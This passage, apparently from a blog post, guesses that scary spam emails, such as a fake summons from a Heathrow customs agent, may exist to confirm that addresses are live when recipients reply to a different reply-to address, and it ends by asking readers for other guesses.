Another guess is that it’s simply used to verify email addresses - you read that a scary Customs agent from Heathrow wants you in his office first thing tomorrow morning, and you quickly reply to ask what it’s about; the spammer (whose reply-to address is different than the “From”) gets a confirmation that your email address is valid, maybe with some more details like your phone number. This is a plausible explanation but it seems like too much hard work just to get some valid email addresses.
Any other guesses?